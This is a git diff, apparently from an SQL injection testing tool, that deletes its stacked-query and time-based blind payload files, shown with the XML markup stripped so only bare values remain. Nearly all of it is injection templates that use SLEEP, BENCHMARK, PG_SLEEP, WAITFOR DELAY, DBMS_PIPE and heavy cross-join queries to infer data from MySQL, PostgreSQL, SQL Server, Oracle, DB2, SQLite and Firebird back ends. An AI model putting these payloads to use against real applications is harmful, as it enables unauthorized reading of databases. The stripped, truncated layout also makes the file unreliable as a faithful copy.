- ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3
-
- ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3
- --
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- SAP MaxDB stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3
-
- ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- HSQLDB >= 1.7.2 stacked queries (heavy query - comment)
- 4
- 4
- 2
- 1-8
- 1
- ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END
-
- ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 1.7.2 stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END
-
- ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 2.0 stacked queries (heavy query - comment)
- 4
- 4
- 2
- 1-8
- 1
- ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END
-
- ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 2.0
-
-
-
-
- HSQLDB >= 2.0 stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END
-
- ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
-
-
-
-
-
- HSQLDB
- >= 2.0
-
-
-
-
-
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
deleted file mode 100644
index 21a50ce4016..00000000000
--- a/data/xml/payloads/time_blind.xml
+++ /dev/null
@@ -1,2174 +0,0 @@
-
-
-
-
-
-
-
- MySQL >= 5.0.12 AND time-based blind (query SLEEP)
- 5
- 1
- 1
- 1,2,3,8,9
- 1
- AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 OR time-based blind (query SLEEP)
- 5
- 1
- 3
- 1,2,3,9
- 1
- OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 AND time-based blind (SLEEP)
- 5
- 2
- 1
- 1,2,3,8,9
- 1
- AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- AND SLEEP([SLEEPTIME])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 OR time-based blind (SLEEP)
- 5
- 2
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- OR SLEEP([SLEEPTIME])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)
- 5
- 3
- 1
- 1,2,3,9
- 1
- AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- AND SLEEP([SLEEPTIME])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)
- 5
- 3
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- OR SLEEP([SLEEPTIME])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)
- 5
- 3
- 1
- 1,2,3,9
- 1
- AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)
- 5
- 3
- 3
- 1,2,3,9
- 1
- OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL < 5.0.12 AND time-based blind (BENCHMARK)
- 5
- 2
- 2
- 1,2,3,8,9
- 1
- AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
-
-
-
-
-
- MySQL
- < 5.0.12
-
-
-
-
- MySQL > 5.0.12 AND time-based blind (heavy query)
- 5
- 3
- 2
- 1,2,3,8,9
- 1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
-
-
-
-
-
- MySQL
- > 5.0.12
-
-
-
-
- MySQL < 5.0.12 OR time-based blind (BENCHMARK)
- 5
- 2
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
-
-
-
-
-
- MySQL
- < 5.0.12
-
-
-
-
- MySQL > 5.0.12 OR time-based blind (heavy query)
- 5
- 3
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
-
-
-
-
-
- MySQL
- > 5.0.12
-
-
-
-
- MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
- #
-
-
-
-
-
- MySQL
- < 5.0.12
-
-
-
-
- MySQL > 5.0.12 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
- #
-
-
-
-
-
- MySQL
- > 5.0.12
-
-
-
-
- MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
- #
-
-
-
-
-
- MySQL
- < 5.0.12
-
-
-
-
- MySQL > 5.0.12 OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
- #
-
-
-
-
-
- MySQL
- > 5.0.12
-
-
-
-
- MySQL >= 5.0.12 RLIKE time-based blind
- 5
- 2
- 1
- 1,2,3,9
- 1
- RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))
-
- RLIKE SLEEP([SLEEPTIME])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 RLIKE time-based blind (comment)
- 5
- 4
- 1
- 1,2,3,9
- 1
- RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))
-
- RLIKE SLEEP([SLEEPTIME])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)
- 5
- 3
- 1
- 1,2,3,9
- 1
- RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
- 5
- 4
- 1
- 1,2,3,9
- 1
- RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL AND time-based blind (ELT)
- 5
- 3
- 1
- 1,2,3,8,9
- 1
- AND ELT([INFERENCE],SLEEP([SLEEPTIME]))
-
- AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL OR time-based blind (ELT)
- 5
- 3
- 3
- 1,2,3,9
- 1
- OR ELT([INFERENCE],SLEEP([SLEEPTIME]))
-
- OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL AND time-based blind (ELT - comment)
- 5
- 5
- 1
- 1,2,3,9
- 1
- AND ELT([INFERENCE],SLEEP([SLEEPTIME]))
-
- AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
- #
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL OR time-based blind (ELT - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR ELT([INFERENCE],SLEEP([SLEEPTIME]))
-
- OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
- #
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 AND time-based blind
- 5
- 1
- 1
- 1,2,3,8,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL > 8.1 OR time-based blind
- 5
- 1
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL > 8.1 AND time-based blind (comment)
- 5
- 4
- 1
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
- --
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL > 8.1 OR time-based blind (comment)
- 5
- 4
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
- --
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL AND time-based blind (heavy query)
- 5
- 2
- 2
- 1,2,3,8,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL OR time-based blind (heavy query)
- 5
- 2
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
- --
-
-
-
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
- --
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind (IF)
- 5
- 1
- 1
- 0
- 1
- IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
-
- WAITFOR DELAY '0:0:[SLEEPTIME]'
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind (IF - comment)
- 5
- 4
- 1
- 0
- 1
- IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
-
- WAITFOR DELAY '0:0:[SLEEPTIME]'
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase AND time-based blind (heavy query)
- 5
- 2
- 2
- 1,2,3,8,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase OR time-based blind (heavy query)
- 5
- 2
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle AND time-based blind
- 5
- 1
- 1
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle OR time-based blind
- 5
- 1
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle AND time-based blind (comment)
- 5
- 4
- 1
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle OR time-based blind (comment)
- 5
- 4
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle AND time-based blind (heavy query)
- 5
- 2
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle OR time-based blind (heavy query)
- 5
- 2
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
- --
-
-
-
-
-
- Oracle
-
-
-
-
- IBM DB2 AND time-based blind (heavy query)
- 5
- 3
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
-
-
-
-
-
- IBM DB2
-
-
-
-
- IBM DB2 OR time-based blind (heavy query)
- 5
- 3
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
-
-
-
-
-
- IBM DB2
-
-
-
-
- IBM DB2 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3,9
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
- --
-
-
-
-
-
- IBM DB2
-
-
-
-
- IBM DB2 OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,2,3,9
- 1
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
- --
-
-
-
-
-
- IBM DB2
-
-
-
-
- SQLite > 2.0 AND time-based blind (heavy query)
- 5
- 3
- 2
- 1,8,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- SQLite > 2.0 OR time-based blind (heavy query)
- 5
- 3
- 3
- 1,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- SQLite > 2.0 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,9
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
- --
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- SQLite > 2.0 OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,9
- 1
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
- --
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- Firebird >= 2.0 AND time-based blind (heavy query)
- 5
- 4
- 2
- 1,9
- 1
- AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- Firebird >= 2.0 OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,9
- 1
- OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- Firebird >= 2.0 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,9
- 1
- AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
- --
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- Firebird >= 2.0 OR time-based blind (heavy query - comment)
- 5
- 5
- 3
- 1,9
- 1
